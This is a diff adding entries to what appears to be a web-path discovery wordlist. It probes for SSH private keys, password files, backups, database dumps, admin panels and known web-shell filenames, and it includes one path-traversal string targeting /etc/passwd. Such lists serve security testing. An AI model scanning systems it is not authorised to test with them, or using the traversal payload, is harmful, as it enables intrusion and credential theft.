+.phptidy-cache
+.phpversion
+.pki
+.placeholder
+.postgres.env
+.powenv
+.pre-commit-config.yaml
+.procmailrc
+.production
+.profile
+.project
+.project.xml
+.project/
+.projectOptions
+.properties
+.psci
+.psci_modules
+.psql_history
+.psqlrc
+.pst
+.pub/
+.pwd
+.pydevproject
+.pylintrc
+.pytest_cache/
+.Python
+.python-eggs
+.python-history
+.python-version
+.qmake.cache
+.qmake.stash
+.qqestore/
+.Rapp.history
+.rar
+.raw
+.rbtp
+.RData
+.rdsTempFiles
+.rebar
+.rediscli_history
+.reek
+.remote
+.remote-sync.json
+.repl_history
+.revision
+.Rhistory
+.rhost
+.rhosts
+.robots.txt
+.rocketeer/
+.ropeproject
+.Rproj.user/
+.rspec
+.rsync-filter
+.rsync_cache
+.rsync_cache/
+.rubocop.yml
+.rubocop_todo.yml
+.ruby-gemset
+.ruby-version
+.rvmrc
+.s3backupstatus
+.sass-cache/
+.scala_history
+.sconsign.dblite
+.scrapy
+.scrutinizer.yml
+.selected_editor
+.settings
+.settings.php.swp
+.settings/
+.settings/.jsdtscope
+.settings/org.eclipse.core.resources.prefs
+.settings/org.eclipse.php.core.prefs
+.settings/org.eclipse.wst.common.project.facet.core.xml
+.settings/org.eclipse.wst.jsdt.ui.superType.container
+.settings/org.eclipse.wst.jsdt.ui.superType.name
+.sh
+.sh_history
+.shrc
+.sln
+.smileys
+.smushit-status
+.spamassassin
+.spyderproject
+.spyproject
+.sql
+.sql.bz2
+.sql.gz
+.sqlite_history
+.src/app.js
+.src/index.js
+.src/server.js
+.ssh
+.ssh.asp
+.ssh.php
+.ssh/
+.ssh/authorized_keys
+.ssh/id_dsa
+.ssh/id_rsa
+.ssh/id_rsa.key
+.ssh/id_rsa.key~
+.ssh/id_rsa.priv
+.ssh/id_rsa.priv~
+.ssh/id_rsa.pub
+.ssh/id_rsa.pub~
+.ssh/id_rsa~
+.ssh/know_hosts
+.ssh/know_hosts~
+.ssh/known_host
+.ssh/known_hosts
+.st_cache/
+.stack-work/
+.style.yapf
+.stylelintrc
+.sublime-gulp.cache
+.sublime-project
+.sublime-workspace
+.subversion
+.sucuriquarantine/
+.sunw
+.svn
+.svn/
+.svn/all-wcprops
+.svn/entries
+.svn/text-base/
+.svn/text-base/index.php.svn-base
+.svnignore
+.sw
+.swf
+.swo
+.swp
+.SyncID
+.SyncIgnore
+.synthquota
+.system/
+.tags
+.tar
+.tar.bz2
+.tar.gz
+.tconn/
+.tconn/tconn.conf
+.temp
+.temp/
+.texpadtmp
+.tfignore
+.tgitconfig
+.thumbs
+.tmp
+.tmp_versions/
+.tmproj
+.tox
+.tox/
+.transients_purge.log
+.Trash
+.Trashes
+.travis.yml
+.tx/
+.txt
+.user.ini
+.users
+.vacation.cache
+.vagrant
+.venv
+.version
+.vgextensions/
+.viminfo
+.vimrc
+.vs/
+.vscode
+.vscode/sftp.json
+.web
+.web-server-pid
+.web.env
+.webassets-cache
+.workspace/
+.wp-config.php.swp
+.www_acl
+.wwwacl
+.yardoc/
+.yarn-integrity
+.yo-rc.json
+.zeus.sock
+.zfs/
+.zip
+.zsh_history
+.zshrc
+/api-doc
+/api-docs
+/api.html
+/api.json
+/api.yaml
+/api.yml
+/api/2/explore/
+/api/docs
+/api/package_search/v4/documentation
+/api/swagger
+/api/swagger-resources
+/api/swagger-ui
+/api/swagger-ui.html
+/api/swagger.json
+/api/swagger.yaml
+/api/swagger.yml
+/api/swagger/v2/api-docs
+/api/swagger/v3/api-docs
+/api/v1/api-docs
+/api/v1/documentation
+/api/v2/api-docs
+/api/v2/documentation
+/api/v2/swagger.json
+/api/v3/api-docs
+/api/v3/documentation
+/api/v3/swagger.json
+/apidoc
+/apidocs
+/application
+/backoffice/v1/ui
+/build/reference/web-api/explore
+/classicapi/doc/
+/core/latest/swagger-ui/index.html
+/csp/gateway/slc/api/swagger-ui.html
+/doc
+/docs
+/documentation/swagger-ui
+/documentation/swagger-ui.html
+/documentation/swagger.json
+/documentation/swagger.yaml
+/documentation/swagger.yml
+/internal/docs
+/loki/api/v1/label
+/loki/api/v1/label/pod/values
+/openapi.json
+/rest/v1
+/rest/v3/doc
+/swagger
+/swagger-resources
+/swagger-resources/configuration/security
+/swagger-resources/configuration/ui
+/swagger-ui.html
+/swagger-ui.html/v2/api-docs
+/swagger-ui.html/v3/api-docs
+/swagger-ui/
+/swagger-ui/index.html
+/swagger.json
+/swagger.yaml
+/swagger.yml
+/swagger/index.html
+/swagger/swagger-ui.html
+/swagger/v2/api-docs
+/swagger/v3/api-docs
+/swaggerui
+/ui
+/ui/
+/v1
+/v1.0
+/v1.1
+/v1.x/swagger-ui.html
+/v2
+/v2.0
+/v2/api-docs
+/v3
+/v3/api-docs
+0.htpasswd
+0.php
+0admin/
+0manager/
+1.7z
+1.htaccess
+1.htpasswd
+1.php
+1.rar
+1.sql
+1.tar
+1.tar.bz2
+1.tar.gz
+1.txt
+1.zip
+10-flannel.conf
+111.php
+123.php
+123.txt
+1c/
+1c_exchange.php
+2.php
+2.sql
+2.txt
+2010.sql
+2010.tar
+2010.tar.bz2
+2010.tar.gz
+2010.tgz
+2010.zip
+2011.sql
+2011.tar
+2011.tar.bz2
+2011.tar.gz
+2011.tgz
+2011.zip
+2012.sql
+2012.tar
+2012.tar.bz2
+2012.tar.gz
+2012.tgz
+2012.zip
+2013.sql
+2013.tar
+2013.tar.bz2
+2013.tar.gz
+2013.tgz
+2013.zip
+2014.sql
+2014.tar
+2014.tar.bz2
+2014.tar.gz
+2014.tgz
+2014.zip
+2015.sql
+2015.tar
+2015.tar.bz2
+2015.tar.gz
+2015.tgz
+2015.zip
+2016.sql
+2016.tar
+2016.tar.bz2
+2016.tar.gz
+2016.tgz
+2016.zip
+2017.sql
+2017.tar
+2017.tar.bz2
+2017.tar.gz
+2017.tgz
+2017.zip
+2018.sql
+2018.tar
+2018.tar.bz2
+2018.tar.gz
+2018.tgz
+2018.zip
+2019.sql
+2019.tar
+2019.tar.bz2
+2019.tar.gz
+2019.tgz
+2019.zip
+2020.sql
+2020.tar
+2020.tar.bz2
+2020.tar.gz
+2020.tgz
+2020.zip
+2021.sql
+2021.tar
+2021.tar.bz2
+2021.tar.gz
+2021.tgz
+2021.zip
+2022-backup.zip
+2022.sql
+2022.tar
+2022.tar.bz2
+2022.tar.gz
+2022.tgz
+2022.zip
+2023-backup.zip
+2023.sql
+2023.tar
+2023.tar.bz2
+2023.tar.gz
+2023.tgz
+2023.zip
+2024-backup.zip
+2024.sql
+2024.tar
+2024.tar.bz2
+2024.tar.gz
+2024.tgz
+2024.zip
+2phpmyadmin/
+3.php
+4.php
+5.php
+6.php
+7.php
+7788.php
+8.php
+8899.php
+9.php
+9678.php
+\..\..\..\..\..\..\..\..\..\etc\passwd
+_.htpasswd
+__admin
+__bx_log.log
+__cache/
+__dummy.html
+__history/
+__index.php
+__init__.py
+__MACOSX
+__main__.py
+__php_errors.log
+__pma___
+__pycache__/
+__recovery/
+__SQL
+__test.php
+__web_console/
+_adm
+_admin
+_book
+_build
+_build/
+_cache/
+_common.xsl
+_config.inc
+_data/
+_data/error_log
+_debugbar/open
+_Dockerfile
+_errors
+_eumm/
+_files
+_fragment
+_h5ai/
+_include
+_index.php
+_install
+_internal
+_layouts
+_layouts/
+_layouts/alllibs.htm
+_layouts/settings.htm
+_layouts/userinfo.htm
+_log/
+_log/access-log
+_log/access.log
+_log/access_log
+_log/error-log
+_log/error.log
+_log/error_log
+_logs
+_logs/
+_logs/access-log
+_logs/access.log
+_logs/access_log
+_logs/err.log
+_logs/error-log
+_logs/error.log
+_logs/error_log
+_LPHPMYADMIN/
+_mmServerScripts/
+_mmServerScripts/MMHTTPDB.asp
+_mmServerScripts/MMHTTPDB.php
+_notes/
+_notes/dwsync.xml
+_novo/
+_novo/composer.lock
+_old
+_pages
+_php_errors.log
+_phpmyadmin/
+_pkginfo.txt
+_private
+_proxy
+_Pvt_Extensions
+_site/
+_source
+_SQL
+_sqladm
+_src
+_TeamCity
+_test
+_thumbs/
+_tracks
+_UpgradeReport_Files/
+_vti_bin/
+_vti_bin/_vti_adm/admin.dll
+_vti_bin/_vti_aut/author.dll
+_vti_bin/shtml.dll
+_vti_pvt/
+_vti_pvt/service.pwt
+_vti_pvt/users.pwt
+_WEB_INF/
+_wl_cls_gen.jar
+_wpeprivate
+_wpeprivate/
+_wpeprivate/config.json
+_www
+_yardoc/
+a%5c.aspx
+a.out
+aadmin/
+abs/
+acceptance_config.yml
+acceso
+acceso.php
+access
+access-log
+access-log.1
+access.1
+access.log
+access.php
+access.txt
+access/
+access_.log
+access_log
+access_log.1
+accesslog
+account.html
+account.php
+accounts
+accounts.php
+accounts.sql
+accounts.txt
+accounts.xml
+accounts/
+acct_login/
+activemq/
+activity.log
+actuator
+actuator/dump
+actuator/env
+actuator/logfile
+actuator/mappings
+actuator/trace
+ad_login
+ad_manage
+add.php
+add_admin
+adfs/services/trust/2005/windowstransport
+adm
+adm.html
+adm.php
+adm/
+adm/admloginuser.php
+adm/index.html
+adm/index.php
+adm_auth
+adm_auth.php
+admin
+admin%20/
+admin-authz.xml
+admin-console
+admin-console/
+admin-database
+admin-database.php
+admin-database/
+admin-dev/
+admin-dev/autoupgrade/
+admin-dev/backups/
+admin-dev/export/
+admin-dev/import/
+admin-login
+admin-login.html
+admin-login.php
+admin-serv/
+admin-serv/config/admpw
+admin.asp
+admin.aspx
+admin.cfm
+admin.cgi
+admin.conf
+admin.conf.default
+admin.dat
+admin.do
+admin.htm
+admin.htm.php
+admin.html
+admin.html.php
+admin.jsp
+admin.mdb
+admin.passwd
+admin.php
+admin.php3
+admin.pl
+admin/
+admin/.config
+admin/.htaccess
+admin/_logs/access-log
+admin/_logs/access.log
+admin/_logs/access_log
+admin/_logs/err.log
+admin/_logs/error-log
+admin/_logs/error.log
+admin/_logs/error_log
+admin/_logs/login.txt
+admin/access.log
+admin/access.txt
+admin/access_log
+admin/account
+admin/account.html
+admin/account.php
+admin/admin
+admin/admin-login
+admin/admin-login.html
+admin/admin-login.php
+admin/admin.html
+admin/admin.php
+admin/admin_login
+admin/admin_login.html
+admin/admin_login.php
+admin/adminLogin
+admin/adminLogin.htm
+admin/adminLogin.html
+admin/adminLogin.php
+admin/backup/
+admin/backups/
+admin/config.php
+admin/controlpanel
+admin/controlpanel.htm
+admin/controlpanel.html
+admin/controlpanel.php
+admin/cp
+admin/cp.html
+admin/cp.php
+admin/db/
+admin/default
+admin/default.asp
+admin/default/admin.asp
+admin/default/login.asp
+admin/download.php
+admin/dumper/
+admin/error.log
+admin/error.txt
+admin/error_log
+admin/export.php
+admin/FCKeditor
+admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
+admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
+admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+admin/fckeditor/editor/filemanager/connectors/php/connector.php
+admin/fckeditor/editor/filemanager/connectors/php/upload.php
+admin/fckeditor/editor/filemanager/upload/asp/upload.asp
+admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
+admin/fckeditor/editor/filemanager/upload/php/upload.php
+admin/file.php
+admin/files.php
+admin/home
+admin/home.html
+admin/home.php
+admin/includes/configure.php~
+admin/index
+admin/index.asp
+admin/index.html
+admin/index.php
+admin/js/tiny_mce/
+admin/js/tinymce/
+admin/log
+admin/login
+admin/login.asp
+admin/login.htm
+admin/login.html
+admin/login.php
+admin/logon.jsp
+admin/logs/
+admin/logs/access-log
+admin/logs/access.log
+admin/logs/access_log
+admin/logs/err.log
+admin/logs/error-log
+admin/logs/error.log
+admin/logs/error_log
+admin/logs/login.txt
+admin/manage
+admin/manage.asp
+admin/manage/admin.asp
+admin/manage/login.asp
+admin/mysql/
+admin/mysql/index.php
+admin/mysql2/index.php
+admin/phpMyAdmin
+admin/phpmyadmin/
+admin/phpMyAdmin/
+admin/phpMyAdmin/index.php
+admin/phpmyadmin/index.php
+admin/phpmyadmin2/index.php
+admin/pMA/
+admin/pma/
+admin/pma/index.php
+admin/PMA/index.php
+admin/pol_log.txt
+admin/private/logs
+admin/secure/logon.jsp
+admin/sqladmin/
+admin/sxd/
+admin/sysadmin/
+admin/upload.php
+admin/uploads.php
+admin/user_count.txt
+admin/web/
+admin0
+admin1
+admin1.htm
+admin1.html
+admin1.php
+admin1/
+admin2
+admin2.asp
+admin2.html
+admin2.old/
+admin2.php
+admin2/
+admin2/index.php
+admin2/login.php
+admin3/
+admin4/
+admin4_account/
+admin4_colon/
+admin5/
+admin_
+admin_/
+admin_admin
+admin_area
+admin_area.php
+admin_area/
+admin_area/admin
+admin_area/admin.html
+admin_area/admin.php
+admin_area/index.html
+admin_area/index.php
+admin_area/login
+admin_area/login.html
+admin_area/login.php
+admin_files
+admin_index
+admin_index.asp
+admin_login
+admin_login.html
+admin_login.php
+admin_login/
+admin_login/admin.asp
+admin_login/login.asp
+admin_logon
+admin_logon/
+admin_main
+admin_pass
+admin_tools/
+adminarea/
+adminarea/admin.html
+adminarea/admin.php
+adminarea/index.html
+adminarea/index.php
+adminarea/login.html
+adminarea/login.php
+adminconsole
+admincontrol
+admincontrol.html
+admincontrol.php
+admincontrol/
+admincontrol/login.html
+admincontrol/login.php
+admincp/
+admincp/index.asp
+admincp/index.html
+admincp/js/kindeditor/
+admincp/login
+admincp/login.asp
+admincp/upload/
+adminedit
+adminer-4.0.0-en.php
+adminer-4.0.0-mysql-en.php
+adminer-4.0.0-mysql.php
+adminer-4.0.0.php
+adminer-4.0.1-en.php
+adminer-4.0.1-mysql-en.php
+adminer-4.0.1-mysql.php
+adminer-4.0.1.php
+adminer-4.0.2-en.php
+adminer-4.0.2-mysql-en.php
+adminer-4.0.2-mysql.php
+adminer-4.0.2.php
+adminer-4.0.3-en.php
+adminer-4.0.3-mysql-en.php
+adminer-4.0.3-mysql.php
+adminer-4.0.3.php
+adminer-4.1.0-en.php
+adminer-4.1.0-mysql-en.php
+adminer-4.1.0-mysql.php
+adminer-4.1.0.php
+adminer-4.2.0-en.php
+adminer-4.2.0-mysql-en.php
+adminer-4.2.0-mysql.php
+adminer-4.2.0.php
+adminer-4.2.1-en.php
+adminer-4.2.1-mysql-en.php
+adminer-4.2.1-mysql.php
+adminer-4.2.1.php
+adminer-4.2.2-en.php
+adminer-4.2.2-mysql-en.php
+adminer-4.2.2-mysql.php
+adminer-4.2.2.php
+adminer-4.2.3-en.php
+adminer-4.2.3-mysql-en.php
+adminer-4.2.3-mysql.php
+adminer-4.2.3.php
+adminer-4.2.4-en.php
+adminer-4.2.4-mysql-en.php
+adminer-4.2.4-mysql.php
+adminer-4.2.4.php
+adminer-4.2.5-en.php
+adminer-4.2.5-mysql-en.php
+adminer-4.2.5-mysql.php
+adminer-4.2.5.php
+adminer-4.3.0-en.php
+adminer-4.3.0-mysql-en.php
+adminer-4.3.0-mysql.php
+adminer-4.3.0.php
+adminer-4.3.1-en.php
+adminer-4.3.1-mysql-en.php
+adminer-4.3.1-mysql.php
+adminer-4.3.1.php
+adminer-4.4.0-en.php
+adminer-4.4.0-mysql-en.php
+adminer-4.4.0-mysql.php
+adminer-4.4.0.php
+adminer-4.5.0-en.php
+adminer-4.5.0-mysql-en.php
+adminer-4.5.0-mysql.php
+adminer-4.5.0.php
+adminer-4.6.0-en.php
+adminer-4.6.0-mysql-en.php
+adminer-4.6.0-mysql.php
+adminer-4.6.0.php
+adminer-4.6.1-en.php
+adminer-4.6.1-mysql-en.php
+adminer-4.6.1-mysql.php
+adminer-4.6.1.php
+adminer-4.6.2-en.php
+adminer-4.6.2-mysql-en.php
+adminer-4.6.2-mysql.php
+adminer-4.6.2.php
+adminer-4.6.3-en.php
+adminer-4.6.3-mysql-en.php
+adminer-4.6.3-mysql.php
+adminer-4.6.3.php
+adminer-4.7.0-en.php
+adminer-4.7.0-mysql-en.php
+adminer-4.7.0-mysql.php
+adminer-4.7.0.php
+adminer-4.7.1-en.php
+adminer-4.7.1-mysql-en.php
+adminer-4.7.1-mysql.php
+adminer-4.7.1.php
+adminer-4.7.2-en.php
+adminer-4.7.2-mysql-en.php
+adminer-4.7.2-mysql.php
+adminer-4.7.2.php
+adminer-4.7.3-en.php
+adminer-4.7.3-mysql-en.php
+adminer-4.7.3-mysql.php
+adminer-4.7.3.php
+adminer-4.7.4-en.php
+adminer-4.7.4-mysql-en.php
+adminer-4.7.4-mysql.php
+adminer-4.7.4.php
+adminer-4.7.5-en.php
+adminer-4.7.5-mysql-en.php
+adminer-4.7.5-mysql.php
+adminer-4.7.5.php
+adminer-4.7.6-en.php
+adminer-4.7.6-mysql-en.php
+adminer-4.7.6-mysql.php
+adminer-4.7.6.php
+adminer-4.7.7-en.php
+adminer-4.7.7-mysql-en.php
+adminer-4.7.7-mysql.php
+adminer-4.7.7.php
+adminer-4.7.8-en.php
+adminer-4.7.8-mysql-en.php
+adminer-4.7.8-mysql.php
+adminer-4.7.8.php
+adminer-4.7.9-en.php
+adminer-4.7.9-mysql-en.php
+adminer-4.7.9-mysql.php
+adminer-4.7.9.php
+adminer-4.8.0-en.php
+adminer-4.8.0-mysql-en.php
+adminer-4.8.0-mysql.php
+adminer-4.8.0.php
+adminer-4.8.1-en.php
+adminer-4.8.1-mysql-en.php
+adminer-4.8.1-mysql.php
+adminer-4.8.1.php
+adminer.php
+adminer/
+adminer/adminer.php
+adminer_coverage.ser
+adminis.php
+administer/
+administr8
+administr8.php
+administr8/
+administracao.php
+administracion.php
+administracion/
+administrador/
+administrateur.php
+administrateur/
+administratie/
+administration
+administration.php
+administration/
+administration/Sym.php
+administrative/
+administrative/login_history
+administrator
+administrator-login/
+administrator.html
+administrator.php
+administrator/
+administrator/.htaccess
+administrator/account
+administrator/account.html
+administrator/account.php
+administrator/admin.asp
+administrator/admin/
+administrator/cache/
+administrator/db/
+administrator/includes/
+administrator/index.html
+administrator/index.php
+administrator/login
+administrator/login.asp
+administrator/login.html
+administrator/login.php
+administrator/logs
+administrator/logs/
+administrator/phpmyadmin/
+administrator/phpMyAdmin/
+administrator/PMA/
+administrator/pma/
+administrator/web/
+administratoraccounts/
+administratorlogin
+administratorlogin.php
+administratorlogin/
+administrators
+administrators.php
+administrators.pwd
+administrators/
+administrivia/
+adminitem
+adminitem/
+adminitems
+adminitems.php
+adminitems/
+adminlogin
+adminLogin.html
+adminLogin.php
+adminlogin.php
+adminLogin/
+adminlogon/
+adminpanel
+adminpanel.html
+adminpanel.php
+adminpanel/
+adminpro/
+admins
+admins.asp
+admins.php
+admins/
+admins/backup/
+admins/log.txt
+adminsite/
+AdminTools/
+adminuser
+admission_controller_config.yaml
+admloginuser.php
+admpar/
+admpar/.ftppass
+admrev/
+admrev/.ftppass
+admrev/_files/
+affiliate
+affiliate.php
+affiliates.sql
+ak47.php
+akeeba.backend.log
+all/
+all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+amad.php
+amministratore.php
+analog.html
+anchor/errors.log
+ansible/
+answers/
+answers/error_log
+apache/
+apache/logs/access.log
+apache/logs/access_log
+apache/logs/error.log
+apache/logs/error_log
+apc-nrp.php
+apc.php
+apc/
+apc/apc.php
+apc/index.php
+api
+api-doc
+api-docs
+api.log
+api.php
+api.py
+api.tar.gz
+api.tgz
+api.zip
+api/
+api/2/explore/
+api/error_log
+api/graphiql
+api/graphql
+api/jsonws
+api/login.json
+api/package_search/v4/documentation
+api/swagger
+api/swagger-ui.html
+api/swagger.yml
+api/v1
+api/v1/graphiql
+api/v1/graphql
+api/v1/playground
+api/v2
+api/v2/graphiql
+api/v2/graphql
+api/v2/playground
+api/v3
+api/v3/graphiql
+api/v3/graphql
+api/v3/playground
+api_log.txt
+apibuild.pyc
+apidoc
+apidocs
+apiserver-aggregator-ca.cert
+apiserver-aggregator.cert
+apiserver-aggregator.key
+apiserver-client.crt
+apiserver-key.pem
+app-service.yaml
+app.config
+app.config.env
+app.env
+app.js
+app.php
+app.yaml
+app.zip
+app/
+app/.htaccess
+app/__pycache__/
+app/bin
+app/bootstrap.php.cache
+app/cache/
+app/composer.json
+app/composer.lock
+app/config/adminConf.json
+app/Config/core.php
+app/Config/database.php
+app/config/database.yml
+app/config/database.yml.pgsql
+app/config/database.yml.sqlite3
+app/config/database.yml_original
+app/config/database.yml~
+app/config/databases.yml
+app/config/global.json
+app/config/parameters.ini
+app/config/parameters.yml
+app/config/routes.cfg
+app/config/schema.yml
+app/dev
+app/docs
+app/etc/config.xml
+app/etc/enterprise.xml
+app/etc/fpc.xml
+app/etc/local.additional
+app/etc/local.xml
+app/etc/local.xml.additional
+app/etc/local.xml.bak
+app/etc/local.xml.live
+app/etc/local.xml.localRemote
+app/etc/local.xml.phpunit
+app/etc/local.xml.template
+app/etc/local.xml.vmachine
+app/etc/local.xml.vmachine.rm
+app/languages
+app/log/
+app/logs/
+app/phpunit.xml
+app/src
+app/storage/
+app/sys
+app/testing
+app/tmp/
+app/unschedule.bat
+app/vendor
+app/vendor-
+app/vendor-src
+app_dev.php
+appcache.manifest
+appengine-generated/
+applet
+application
+application.log
+application.wadl
+application/
+application/cache/
+application/configs/application.ini
+application/logs/
+apply.cgi
+AppPackages/
+apps/
+apps/__pycache__/
+apps/frontend/config/app.yml
+apps/frontend/config/databases.yml
+appveyor.yml
+Aptfile
+ar-lib
+archaius
+archaius.json
+archive.7z
+archive.rar
+archive.sql
+archive.tar
+archive.tar.gz
+archive.tgz
+archive.zip
+article/
+article/admin
+article/admin/admin.asp
+artifactory/
+artifacts/
+ASALocalRun/
+asd.php
+asp.aspx
+aspnet_client/
+aspnet_webadmin
+aspwpadmin
+aspxspy.aspx
+asset..
+assets/
+assets/fckeditor
+assets/js/fckeditor
+assets/npm-debug.log
+assets/pubspec.yaml
+asterisk.log
+asterisk/
+AT-admin.cgi
+atlassian-ide-plugin.xml
+audit.log
+auditevents
+auditevents.json
+auth
+auth.inc
+auth.php
+auth.tar.gz
+auth.zip
+auth_user_file.txt
+authadmin
+authadmin.php
+authadmin/
+authenticate
+authenticate.php
+authentication
+authentication.php
+authlog.txt
+authorization.config
+authorize.php
+authorized_keys
+authorizenet.log
+authuser
+authuser.php
+auto/
+autoconfig
+autoconfig.json
+autodiscover/
+autologin
+autologin.php
+autologin/
+autom4te.cache
+autoscan.log
+AutoTest.Net/
+autoupdate/
+av/
+aws/
+awstats
+awstats.conf
+awstats.pl
+awstats/
+axis/
+axis//happyaxis.jsp
+axis2-web//HappyAxis.jsp
+axis2/
+axis2//axis2-web/HappyAxis.jsp
+axis2/axis2-web/HappyAxis.jsp
+azure-pipelines.yml
+azureadmin/
+b2badmin/
+babel.config.js
+back.sql
+back_office.php
+backoffice.php
+backoffice/
+backoffice/v1/ui
+backup
+backup-2022.zip
+backup-2023.zip
+backup-2024.zip
+backup.7z
+backup.cfg
+backup.htpasswd
+backup.inc
+backup.inc.old
+backup.old
+backup.rar
+backup.sql
+backup.sql.old
+backup.tar
+backup.tar.bz2
+backup.tar.gz
+backup.tgz
+backup.zip
+Backup/
+backup/
+backup0/
+backup1/
+backup123/
+backup2/
+backup2022.zip
+backup2023.zip
+backup2024.zip
+backups
+backups.7z
+backups.inc
+backups.inc.old
+backups.old
+backups.rar
+backups.sql
+backups.sql.old
+backups.tar
+backups.tar.bz2
+backups.tar.gz
+backups.tgz
+backups.zip
+backups/
+bak/
+bamb/
+bamboo/
+banner.swf
+banneradmin/
+base/
+basic_auth.csv
+bb-admin/
+bb-admin/admin
+bb-admin/admin.html
+bb-admin/admin.php
+bb-admin/index.html
+bb-admin/index.php
+bb-admin/login
+bb-admin/login.html
+bb-admin/login.php
+bbadmin/
+bbs/
+bbs/admin/login
+bbs/admin_index.asp
+bea_wls_cluster_internal/
+bea_wls_deployment_internal/
+bea_wls_deployment_internal/DeploymentService
+bea_wls_diagnostics/
+bea_wls_internal/
+beans
+beans.json
+behat.yml
+BenchmarkDotNet.Artifacts/
+Berksfile
+beta
+beta.zip
+bigadmin/
+bigdump.php
+billing
+billing/
+billing/killer.php
+bin-debug/
+bin-release/
+bin/
+bin/config.sh
+bin/hostname
+bin/libs
+bin/reset-db-prod.sh
+bin/reset-db.sh
+bin/RhoBundle
+bin/target
+bin/tmp
+Binaries/
+bitbucket-pipelines.yml
+bitrix/
+bitrix/.settings
+bitrix/.settings.bak
+bitrix/.settings.php
+bitrix/.settings.php.bak
+bitrix/admin/help.php
+bitrix/admin/index.php
+bitrix/admin/site_checker.php
+bitrix/authorization.config
+bitrix/backup/
+bitrix/cache
+bitrix/cache_image
+bitrix/components/bitrix/desktop/admin_settings.php
+bitrix/components/bitrix/map.yandex.search/settings/settings.php
+bitrix/components/bitrix/player/player_playlist_edit.php
+bitrix/components/bitrix/sender.mail.editor/ajax.php
+bitrix/dumper/
+bitrix/error.log
+bitrix/import/
+bitrix/import/files
+bitrix/import/import
+bitrix/import/m_import
+bitrix/license_key.php
+bitrix/logs/
+bitrix/managed_cache
+bitrix/modules
+bitrix/modules/error.log
+bitrix/modules/error.log.old
+bitrix/modules/main/admin/restore.php
+bitrix/modules/main/classes/mysql/agent.php
+bitrix/modules/main/include/virtual_file_system.php
+bitrix/modules/serverfilelog-0.dat
+bitrix/modules/serverfilelog-1.dat
+bitrix/modules/serverfilelog_tmp.dat
+bitrix/modules/smtpd.log
+bitrix/modules/updater.log
+bitrix/modules/updater_partner.log
+bitrix/otp/
+bitrix/php_interface/dbconn.php
+bitrix/php_interface/dbconn.php2
+bitrix/settings
+bitrix/settings.bak
+bitrix/settings.php
+bitrix/settings.php.bak
+bitrix/stack_cache
+bitrix/tools/autosave.php
+bitrix/tools/get_catalog_menu.php
+bitrix/tools/html_editor_action.php
+bitrix/tools/mail_entry.php
+bitrix/tools/upload.php
+bitrix/tools/vote/uf.php
+bitrix/web.config
+bitrix_server_test.log
+bitrix_server_test.php
+bitrixsetup.php
+biy/
+biy/upload/
+Black.php
+blacklist.dat
+bld/
+blib/
+blockchain.json
+blog/
+blog/error_log
+blog/wp-content/backup-db/
+blog/wp-content/backups/
+blog/wp-login
+blog/wp-login.php
+blogindex/
+bookContent.swf
+boot.php
+bootstrap/data
+bootstrap/tmp
+bot.txt
+bower.json
+bower_components
+bower_components/
+box.json
+Brocfile.coffee
+Brocfile.js
+browser/
+brunch-config.coffee
+brunch-config.js
+bsmdashboards/messagebroker/amfsecure
+buck.sql
+buffer.conf
+bugs
+build
+Build
+build-iPhoneOS/
+build-iPhoneSimulator/
+Build.bat
+build.local.xml
+build.log
+build.properties
+build.sh
+build.xml
+build/
+build/build.properties
+build/buildinfo.properties
+build/reference/web-api/explore
+build/Release
+build_config_private.ini
+build_isolated/
+buildNumber.properties
+BundleArtifacts/
+bx_1c_import.php
+c-h.v2.php
+c100.php
+c22.php
+c99.php
+c99shell.php
+ca.crt
+ca.kru
+cabal-dev
+cabal.project.local
+cabal.project.local~
+cabal.sandbox.config
+cache
+cache-downloads
+cache/
+cache/sql_error_latest.cgi
+cachemgr.cgi
+caches
+cadmins/
+Cakefile
+Capfile
+capistrano/
+captures/
+Cargo.lock
+Carthage/Build
+cassandra/
+catalog.wci
+CATKIN_IGNORE
+cbx-portal/
+cbx-portal/js/zeroclipboard/ZeroClipboard.swf
+cc-errors.txt
+cc-log.txt
+ccbill.log
+ccp14admin/
+celerybeat-schedule
+cell.xml
+centreon/
+cert/
+certenroll/
+certprov/
+certsrv/
+cfexec.cfm
+cfg/
+cfg/cpp/
+CFIDE/
+CFIDE/administrator/
+cgi-bin/
+cgi-bin/awstats.pl
+cgi-bin/logi.php
+cgi-bin/login
+cgi-bin/login.cgi
+cgi-bin/php.ini
+cgi-bin/printenv.pl
+cgi-bin/test-cgi
+cgi-bin/test.cgi
+cgi-bin/ViewLog.asp
+cgi-sys/
+cgi-sys/realsignup.cgi
+cgi.pl/
+cgi/
+cgi/common.cg
+cgi/common.cgi
+Cgishell.pl
+change.log
+changeall.php
+ChangeLog
+CHANGELOG
+changelog
+Changelog
+ChangeLog.html
+changelog.html
+CHANGELOG.HTML
+CHANGELOG.html
+Changelog.html
+CHANGELOG.md
+Changelog.md
+CHANGELOG.MD
+changelog.md
+ChangeLog.md
+changelog.txt
+Changelog.txt
+ChangeLog.txt
+CHANGELOG.txt
+CHANGELOG.TXT
+CHANGES.html
+CHANGES.md
+changes.txt
+check
+check.php
+checkadmin
+checkadmin.php
+checked_accounts.txt
+checklogin
+checklogin.php
+checkouts/
+checkstyle/
+checkuser
+checkuser.php
+chef/
+Cheffile
+chefignore
+chkadmin
+chklogin
+chubb.xml
+ci/
+cidr.txt
+circle.yml
+Citrix/
+citrix/
+Citrix/PNAgent/config.xml
+citydesk.xml
+ckeditor
+ckeditor/
+ckeditor/ckfinder/ckfinder.html
+ckeditor/ckfinder/core/connector/asp/connector.asp
+ckeditor/ckfinder/core/connector/aspx/connector.aspx
+ckeditor/ckfinder/core/connector/php/connector.php
+ckfinder/
+ckfinder/ckfinder.html
+claroline/phpMyAdmin/index.php
+classes/
+classes/cookie.txt
+classes_gen
+classic.json
+classic.jsonp
+cleanup.log
+cli/
+client.ovpn
+client_.ovpn
+client_secret.json
+client_secrets.json
+ClientAccessPolicy.xml
+ClientBin/
+cliente/
+cliente/downloads/h4xor.php
+clients.mdb
+clients.sql
+clients.sqlite
+clients.tar.gz
+clients.zip
+cloud-config.yml
+cloud/
+cmake_install.cmake
+CMakeCache.txt
+CMakeFiles
+CMakeLists.txt
